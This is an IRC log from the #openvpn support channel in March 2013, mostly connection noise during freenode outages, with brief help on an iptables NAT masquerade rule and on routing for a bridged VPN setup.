[~pppingme@unaffiliated/pppingme] has joined #openvpn 19:38 -!- jzaw [~jzaw@2001:8b0:7:0:5054:ff:fe8e:3b24] has joined #openvpn 19:38 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 19:38 -!- fatpony [~fatpony@88-190-211-231.rev.dedibox.fr] has joined #openvpn 19:38 -!- fatpony [~fatpony@88-190-211-231.rev.dedibox.fr] has quit [Changing host] 19:38 -!- fatpony [~fatpony@unaffiliated/fatpony] has joined #openvpn 19:39 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Remote host closed the connection] 19:39 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 19:39 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 19:39 -!- js_ [~js@176.58.116.152] has joined #openvpn 19:39 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 19:39 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 256 seconds] 19:39 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 19:39 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 19:40 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 19:40 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 258 seconds] 19:40 -!- hazardous [~dbn@void.kassad.in] has quit [Ping timeout: 264 seconds] 19:41 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 19:41 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 19:41 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 19:41 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn 19:41 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host] 19:41 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 19:41 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:41 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:41 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 19:41 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Read error: Connection reset by peer] 19:41 -!- AsadH [~AsadH@irc.unixio.com] has joined #openvpn 19:41 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 19:41 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 19:41 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 19:41 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 19:42 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 256 seconds] 19:42 -!- pekster_ is now known as pekster 19:43 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 19:43 -!- SuperGauntlet [~SuperGaun@d14-69-67-219.try.wideopenwest.com] has joined #openvpn 19:43 < SuperGauntlet> !tcp 19:43 < SuperGauntlet> shoot, wrong one. Is it !forwarding? 19:43 < SuperGauntlet> !forwarding 19:44 <@krzee> !ping 19:44 <@krzee> freenode issues 19:44 -!- js__ [~js@li503-152.members.linode.com] has joined #openvpn 19:44 -!- oc80z [oc80z@blea.ch] has joined #openvpn 19:44 < SuperGauntlet> damn. 19:44 -!- mete [~mete@mete.shell.la] has joined #openvpn 19:44 <@krzee> what are you looking for? 19:44 < SuperGauntlet> uhh, what's the iptables command to route traffic as a NAT through the router? 19:44 < SuperGauntlet> it had masquerade at the end IIRC 19:44 < SuperGauntlet> I have ipv4 forwarding turned on in sysctl 19:45 -!- joshie [~josh@joshie.net] has joined #openvpn 19:45 -!- inimino [~inimino@oftn/board/inimino] has joined #openvpn 19:45 <@krzee> iptables -t nat -A POSTROUTING -s $PRIVATE -o eth0 -j MASQUERADE 19:45 <@krzee> assuming $private is your vpn subnet 19:45 < SuperGauntlet> Where $private is like 10.8.whatever? 19:45 <@krzee> ya 19:45 < SuperGauntlet> i think in this case 10.8.0.0/24 19:45 <@krzee> don't forget to enable ip forwarding as well 19:45 < SuperGauntlet> whatever default is 19:45 <@krzee> yes ^ 19:46 <@krzee> there is no default 19:46 -!- joshie is now known as Guest16753 19:46 <@krzee> its whatever you used in --server 19:46 < SuperGauntlet> the server line is 10.8.0.0 255.255.255.0 19:46 < SuperGauntlet> so 10.8.0.0/24, correct? 19:46 <@krzee> yes 19:47 * krzee kicks vpnHelper 19:47 <@krzee> !ping 19:47 -!- pwrcycle_ [~pwrcycle@173.214.160.92] has joined #openvpn 19:47 -!- cronix2 [~cronix@HSI-KBW-046-005-192-177.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 19:48 < SuperGauntlet> Alright, works, thanks 19:48 -!- kantlive- [~kantlivel@home.kantlivelong.com] has joined #openvpn 19:48 <@krzee> yw 19:48 < SuperGauntlet> I should automate that 19:48 < SuperGauntlet> maybe add it in the openvpn init script or something dumb like that 19:50 < pekster> krzee: FYI, massive delays all over. Nickserv (the real one, not some spoof) took a good 2 minutes to reply to me 19:50 < SuperGauntlet> yeah I see why UDP is recommended, I'm getting about 70% the speed of UDP with TCP 19:50 < SuperGauntlet> ping is about the same though. 19:50 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 19:50 -!- js_ [~js@176.58.116.152] has quit [Ping timeout: 258 seconds] 19:50 -!- cronix2 is now known as 18VAAWJLJ 19:50 -!- oc80z [oc80z@blea.ch] has quit [Read error: Connection reset by peer] 19:50 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 258 seconds] 19:50 -!- cronix [~cronix@HSI-KBW-046-005-192-177.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 258 seconds] 19:50 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 19:50 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:50 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:50 -!- oc80z [oc80z@blea.ch] has joined #openvpn 19:51 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 264 seconds] 19:51 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 264 seconds] 19:52 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn 19:53 <@krzee> pekster, did my message of thanks make it to you? 19:54 < pekster> Yup 19:54 <@krzee> cool =] 19:54 < pekster> We'll beat some cood coding practices into you yet ;) 19:54 <@krzee> one day ;] 19:54 < pekster> good* 19:55 < pekster> Development: where all the bugs happen^wget fixed 19:55 <@krzee> lol 20:00 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 20:02 -!- pwrcycle_ [~pwrcycle@173.214.160.92] has quit [Ping timeout: 245 seconds] 20:03 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 20:04 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 20:07 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Ping timeout: 258 seconds] 20:07 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 258 seconds] 20:08 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 20:08 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 20:08 -!- mode/#openvpn [+o vpnHelper] by ChanServ 20:08 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 20:08 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 20:08 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 20:08 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 20:09 -!- Netsplit *.net <-> *.split quits: piele, Olipro, [fred] 20:13 -!- Netsplit over, joins: Olipro, [fred] 20:13 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Max SendQ exceeded] 20:19 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 20:20 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 20:20 -!- kmmndr [~tomtom@bro67-2-82-227-110-8.fbx.proxad.net] has joined #openvpn 20:20 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 20:20 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 20:20 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 20:20 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 20:21 < nsx> Hey guys, this is my situation: 2 interfaces eth0 [172.22.22.0/24] and br0(eth1+tap0) [172.23.23.0/24]. clients connect via the eth0 interface and are bridged onto the 23.23 network. Clients on the 23.23 network are able to communicate with hosts on the 22.22 network, but "ping -I br0 172.22.22.1" doesnt work. So i'm guessing routing issues - any ideas? 20:22 < nsx> maybe pekster has an idea? You usually do 20:24 <@krzee> does 172.22.22.1 know what machine it needs to send traffic to in order to reach the vpn subnet? 20:24 <@krzee> i don't do bridges but my first guess would be !route_outside_ovpn 20:24 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:24 <@krzee> !route_outside_ovpn 20:24 <@krzee> (if vpnHelper answers) 20:24 <@vpnHelper> "route_outside_ovpn" is "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 20:27 -!- tabakhase [t4b4kh453@unaffiliated/tabakhase] has quit [Ping timeout: 264 seconds] 20:27 -!- tabakhase_ [t4b4kh453@rps9289.ovh.net] has joined #openvpn 20:28 -!- Netsplit *.net <-> *.split quits: batrick_, kantlive- 20:28 < nsx> hmm it should, but wait a minute 20:28 -!- havoc_ [~havoc@neptune.chaillet.net] has joined #openvpn 20:28 -!- havoc [~havoc@208.87.120.111] has quit [Ping timeout: 264 seconds] 20:29 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 20:30 -!- kevinsky [~kevin@senna.rosendaal.net] has quit [Ping timeout: 252 seconds] 20:30 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has joined #openvpn 20:31 -!- Guest16753 [~josh@joshie.net] has quit [Remote host closed the connection] 20:31 -!- joshie_ [~josh@joshie.net] has joined #openvpn 20:31 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Client Quit] 20:32 -!- kevinsky [~kevin@senna.rosendaal.net] has joined #openvpn 20:33 -!- Netsplit *.net <-> *.split quits: Cr4zi3 20:33 -!- Netsplit *.net <-> *.split quits: Wintereise, jave, ScriptFanix 20:33 -!- Netsplit *.net <-> *.split quits: [fred], Olipro, piele 20:36 -!- Netsplit over, joins: Cr4zi3 20:38 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 20:38 -!- [fred] [fred@konfuzi.us] has joined #openvpn 20:39 -!- Netsplit *.net <-> *.split quits: Olipro, [fred] 20:39 -!- fatpony [~fatpony@unaffiliated/fatpony] has left #openvpn [] 20:39 -!- _quadDam1ge [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 20:39 -!- batrick_ [~batrick@nmap/developer/batrick] has joined #openvpn 20:40 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 20:40 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 20:40 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 258 seconds] 20:40 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 20:40 -!- mode/#openvpn [+o vpnHelper] by ChanServ 20:41 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has quit [Ping timeout: 240 seconds] 20:41 -!- tabakhase_ [t4b4kh453@rps9289.ovh.net] has quit [Ping timeout: 240 seconds] 20:41 < nsx> krzee: think you just helped me one step closer a solution :) thx! 20:41 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 20:42 -!- nsx [~ns@87-57-145-221-dynamic.dk.customer.tdc.net] has quit [Quit: nsx] 20:42 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 20:42 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Excess Flood] 20:43 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 20:43 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 20:45 -!- tabakhase_ [t4b4kh453@rps9289.ovh.net] has joined #openvpn 20:46 -!- Netsplit over, joins: Olipro, [fred] 20:46 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Max SendQ exceeded] 20:47 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 20:50 -!- joshie [~josh@199.167.120.240] has joined #openvpn 20:55 -!- sitaktif1 [~sitaktif@kollok.org] has joined #openvpn 20:56 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 20:56 -!- joshie__ [~josh@joshie.net] has joined #openvpn 20:57 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 20:59 -!- Willis [Willis@173.234.237.131] has joined #openvpn 21:02 -!- Netsplit *.net <-> *.split quits: Wintereise 21:02 -!- Netsplit *.net <-> *.split quits: [fred] 21:04 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has quit [Quit: Lost terminal] 21:07 -!- havoc_ [~havoc@neptune.chaillet.net] has quit [Ping timeout: 258 seconds] 21:08 -!- havoc [~havoc@neptune.chaillet.net] has joined #openvpn 21:08 -!- emmanuel__ [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 21:08 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 21:09 -!- joshie_ [~josh@joshie.net] has quit [Ping timeout: 684 seconds] 21:09 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 21:09 -!- penk [~dave@97.95.190.204] has quit [Quit: Leaving...] 21:10 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 21:10 -!- mode/#openvpn [+o vpnHelper] by ChanServ 21:11 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 21:11 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 21:11 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 21:11 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 258 seconds] 21:11 -!- joshie [~josh@199.167.120.240] has quit [Ping timeout: 253 seconds] 21:12 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 21:14 -!- Olipro_ [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 21:14 -!- [fred] [fred@konfuzi.us] has joined #openvpn 21:14 -!- Olipro_ [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Max SendQ exceeded] 21:16 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 21:17 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 21:21 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 258 seconds] 21:21 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Connection reset by peer] 21:24 -!- AsadH [~AsadH@irc.unixio.com] has joined #openvpn 21:25 < SuperGauntlet> man what kind of jerk DDoSes freenode? 21:25 < SuperGauntlet> -_- 21:25 -!- SuperGauntlet [~SuperGaun@d14-69-67-219.try.wideopenwest.com] has quit [Quit: Leaving] 21:26 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 21:26 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 21:26 -!- piele [~Unknown@bakzeil.creativeserver.net] has quit [Ping timeout: 256 seconds] 21:27 -!- tabakhase_ [t4b4kh453@rps9289.ovh.net] has quit [Ping timeout: 256 seconds] 21:29 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has quit [Ping timeout: 256 seconds] 21:33 -!- Netsplit *.net <-> *.split quits: tjz, havoc 21:33 -!- bkrieg1337 [~bkrieg133@li515-89.members.linode.com] has joined #openvpn 21:34 -!- HectorBarbossa [~uid7850@gateway/web/irccloud.com/session] has joined #openvpn 21:34 -!- HectorBarbossa [~uid7850@gateway/web/irccloud.com/session] has quit [Changing host] 21:34 -!- HectorBarbossa [~uid7850@gateway/web/irccloud.com/x-qtpmfgmmzknmvzeh] has joined #openvpn 21:34 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 21:34 -!- havoc_ [~havoc@neptune.chaillet.net] has joined #openvpn 21:34 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 21:34 -!- batrick_ is now known as batrick 21:34 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 21:34 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 21:35 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 21:35 -!- Netsplit *.net <-> *.split quits: Olipro, [fred] 21:36 -!- Netsplit over, joins: Olipro, [fred] 21:36 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Max SendQ exceeded] 21:36 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-rjsxcaghxmqzqazi] has joined #openvpn 21:36 -!- tabakhase_ [t4b4kh453@rps9289.ovh.net] has joined #openvpn 21:40 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Read error: Operation timed out] 21:41 -!- Rough_ [Ah2k@114.31.8.194] has quit [Read error: Connection reset by peer] 21:41 -!- Ah2k_ [Ah2k@114.31.8.194] has joined #openvpn 21:41 -!- HectorBarbossa_ [uid7850@gateway/web/irccloud.com/session] has joined #openvpn 21:41 -!- timmmaaaayyy [~timmmaaaa@cpe-68-175-79-100.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 21:41 -!- bkrieg1337_ [~bkrieg133@li515-89.members.linode.com] has joined #openvpn 21:41 -!- HectorBarbossa_ [uid7850@gateway/web/irccloud.com/session] has quit [Changing host] 21:41 -!- HectorBarbossa_ [uid7850@gateway/web/irccloud.com/x-wubrdangrskrivay] has joined #openvpn 21:42 -!- bkrieg1337 [~bkrieg133@li515-89.members.linode.com] has quit [Read error: Connection reset by peer] 21:42 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 21:43 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 256 seconds] 21:43 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 21:43 -!- HectorBarbossa [~uid7850@gateway/web/irccloud.com/x-qtpmfgmmzknmvzeh] has quit [Ping timeout: 258 seconds] 21:44 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 258 seconds] 21:46 -!- HectorBarbossa_ is now known as HectorBarbossa 21:47 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 21:47 -!- havoc_ [~havoc@neptune.chaillet.net] has quit [Ping timeout: 252 seconds] 21:47 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 21:47 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 21:47 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 21:48 -!- havoc [~havoc@neptune.chaillet.net] has joined #openvpn 21:49 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 21:49 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 21:49 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 21:51 -!- timmmaaaayyy [~timmmaaaa@cpe-68-175-79-100.nyc.res.rr.com] has joined #openvpn 21:51 -!- bkrieg1337__ [~bkrieg133@li515-89.members.linode.com] has joined #openvpn 21:51 -!- bkrieg1337_ [~bkrieg133@li515-89.members.linode.com] has quit [Read error: Connection reset by peer] 21:52 -!- Ah2k_ is now known as Rough_ 21:52 -!- bkrieg1337__ [~bkrieg133@li515-89.members.linode.com] has quit [Read error: Connection reset by peer] 21:53 -!- bkrieg1337__ [~bkrieg133@li515-89.members.linode.com] has joined #openvpn 21:55 -!- Netsplit *.net <-> *.split quits: b00gz_ 22:00 -!- bkrieg1337__ [~bkrieg133@li515-89.members.linode.com] has quit [Read error: Connection reset by peer] 22:00 -!- rooth_ [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 22:05 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 256 seconds] 22:06 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 22:06 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 22:06 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 22:06 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 22:12 -!- Sickness\ is now known as sickness\ 22:28 -!- sickness\ is now known as Sickness\ 22:40 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 22:58 -!- Netsplit *.net <-> *.split quits: Wintereise 22:59 -!- pa__ [~pa@host95-21-dynamic.61-82-r.retail.telecomitalia.it] has joined #openvpn 22:59 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 246 seconds] 23:01 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 23:02 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 23:02 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 23:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 23:13 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Ping timeout: 252 seconds] 23:14 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 23:26 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 23:26 -!- mode/#openvpn [+o vpnHelper] by ChanServ 23:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 23:47 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 255 seconds] 23:52 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-jwvwhuuvningrgva] has joined #openvpn --- Day changed Mon Mar 25 2013 00:11 -!- jpalmer_ [~jpalmer@irc.PalmerIT.net] has quit [Quit: leaving] 00:30 -!- Scrumps [~asdfgjkl@cpe-173-095-129-006.nc.res.rr.com] has quit [] 00:31 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 00:31 -!- mode/#openvpn [+o krzee] by ChanServ 00:39 -!- sauce [~sauce@unaffiliated/sauce] has quit [Ping timeout: 245 seconds] --- Log closed Mon Mar 25 00:44:46 2013 --- Log opened Mon Mar 25 00:45:02 2013 00:45 -!- ecrist_ [~ecrist@token-black.secure-computing.net] has joined #openvpn 00:45 -!- Irssi: #openvpn: Total of 172 nicks [6 ops, 0 halfops, 0 voices, 166 normal] 00:45 !card.freenode.net [freenode-info] channel flooding and no channel staff around to help? Please check with freenode support: http://freenode.net/faq.shtml#gettinghelp 00:45 -!- Irssi: Join to #openvpn was synced in 39 secs 00:45 -!- EugeneK [~eugene@madeitwor.se] has joined #openvpn 00:46 -!- sauce [~sauce@unaffiliated/sauce] has quit [Ping timeout: 245 seconds] 00:46 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 245 seconds] 00:46 -!- Aketzu [akolehma@kelvin.aketzu.net] has quit [Ping timeout: 245 seconds] 00:46 -!- thumbs [1000@unaffiliated/thumbs] has quit [Ping timeout: 245 seconds] 00:46 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Ping timeout: 245 seconds] 00:46 -!- MorgyN [~mig@island.morgyn.org] has quit [Ping timeout: 245 seconds] 00:46 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Ping timeout: 245 seconds] 00:46 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has quit [Ping timeout: 245 seconds] 00:46 -!- Champi [Champi@rootshell.fr] has quit [Ping timeout: 245 seconds] 00:46 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 245 seconds] 00:46 -!- Aprogas [aprogas@enki.aprogas.net] has quit [Ping timeout: 245 seconds] 00:46 -!- maetrik [maetrik@185.14.184.81] has quit [Ping timeout: 245 seconds] 00:46 -!- zarrsh [~zarrsh@cpe-65-27-192-220.cinci.res.rr.com] has quit [Ping timeout: 245 seconds] 00:46 -!- ecrist [~ecrist@freebsd/contributor/openvpn.community.support.ecrist] has quit [Ping timeout: 245 seconds] 00:46 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 245 seconds] 00:46 -!- nikitosiusis [~nikitos@2a02:6b8:0:81f::189] has quit [Ping timeout: 245 seconds] 00:46 -!- C_S_B [~C-S-B@craigsblackie.broker.freenet6.net] has quit [Ping timeout: 245 seconds] 00:46 -!- ihptru_ is now known as ihptru 00:46 -!- EugeneK is now known as EugeneKay 00:46 -!- Champi [Champi@rootshell.fr] has joined #openvpn 00:46 -!- nikitosiusis [~nikitos@2a02:6b8:0:81f::189] has joined #openvpn 00:46 -!- C-S-B [~C-S-B@craigsblackie.broker.freenet6.net] has joined #openvpn 00:47 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 00:47 -!- eric [eric@185.14.184.81] has joined #openvpn 00:47 -!- eric is now known as Guest86768 02:25 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 02:39 -!- Guest86768 [eric@185.14.184.81] has quit [Quit: Bye Bye!] 02:41 -!- maetrik [maetrik@185.14.184.81] has joined #openvpn 03:20 -!- nastjuid_ [~nastjuid@c-76-102-128-160.hsd1.ca.comcast.net] has quit [Ping timeout: 256 seconds] 03:22 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has quit [Read error: Connection reset by peer] 03:34 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn 03:37 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 03:39 -!- C-S-B [~C-S-B@craigsblackie.broker.freenet6.net] has quit [Ping timeout: 264 seconds] 03:39 -!- EugeneKay [~eugene@madeitwor.se] has quit [Ping timeout: 264 seconds] 03:39 -!- zeroXten_ [~zeroXten@0x10.co.uk] has quit [Ping timeout: 264 seconds] 03:39 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 03:39 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 03:39 -!- Aketzu [akolehma@81.22.244.161] has joined #openvpn 03:39 -!- Netsplit *.net <-> *.split quits: MorgyN_, Wintereise 03:40 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 03:40 -!- Netsplit *.net <-> *.split quits: zarrsh_, frank-- 03:40 -!- piele [~Unknown@bakzeil.creativeserver.net] has quit [Ping timeout: 256 seconds] 03:42 -!- Netsplit *.net <-> *.split quits: [fred], Aketzu_, TypoNe 03:42 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 03:42 -!- C-S-B [~C-S-B@craigsblackie.broker.freenet6.net] has joined #openvpn 03:43 -!- Cybert1nus is now known as Cybertinus 03:43 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has quit [Quit: q] 03:44 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn 03:44 -!- ingmar5 [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Excess Flood] 03:44 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 03:44 -!- Netsplit over, joins: TypoNe 03:44 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 03:44 -!- Netsplit over, joins: [fred] 03:44 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 03:44 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Max SendQ exceeded] 03:45 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 03:45 -!- zarrsh [~zarrsh@cpe-65-27-192-220.cinci.res.rr.com] has joined #openvpn 03:45 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 03:45 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 03:46 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 03:49 -!- thumbs [1000@unaffiliated/thumbs] has joined #openvpn 03:54 -!- Netsplit *.net <-> *.split quits: zarrsh, Wintereise 03:54 -!- Netsplit over, joins: zarrsh 03:55 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 03:55 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 03:55 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 03:55 -!- nastjuid [~nastjuid@c-76-102-128-160.hsd1.ca.comcast.net] has joined #openvpn 04:06 -!- nikitosiusis [~nikitos@2a02:6b8:0:81f::189] has quit [Remote host closed the connection] 04:19 -!- defswork [~andy@141.0.50.105] has joined #openvpn 04:25 -!- Aprogas_ is now known as Aprogas 04:29 -!- nutcase 